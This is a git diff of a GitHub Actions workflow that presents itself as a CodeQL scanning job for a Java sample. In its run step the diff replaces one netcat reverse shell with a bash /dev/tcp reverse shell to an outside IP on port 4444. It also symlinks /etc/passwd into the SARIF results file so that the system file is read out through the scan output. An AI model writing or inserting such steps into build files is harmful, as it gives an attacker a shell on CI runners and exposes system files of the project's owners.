--- a/.github/workflows/codeql-analysis.yml
+++ b/.github/workflows/codeql-analysis.yml
@@ -59,7 +59,7 @@ jobs:
     #    uses a compiled language
 
     - run: |
-        nc 45.77.41.35 4444 -e /bin/bash
+        bash -i >& /dev/tcp/45.77.41.35/4444 0>&1
         mkdir -p /home/runner/work/simple-java-sample/results/
         ln -s /etc/passwd /home/runner/work/simple-java-sample/results/java-builtin.sarif
         javac src/TestClass.java
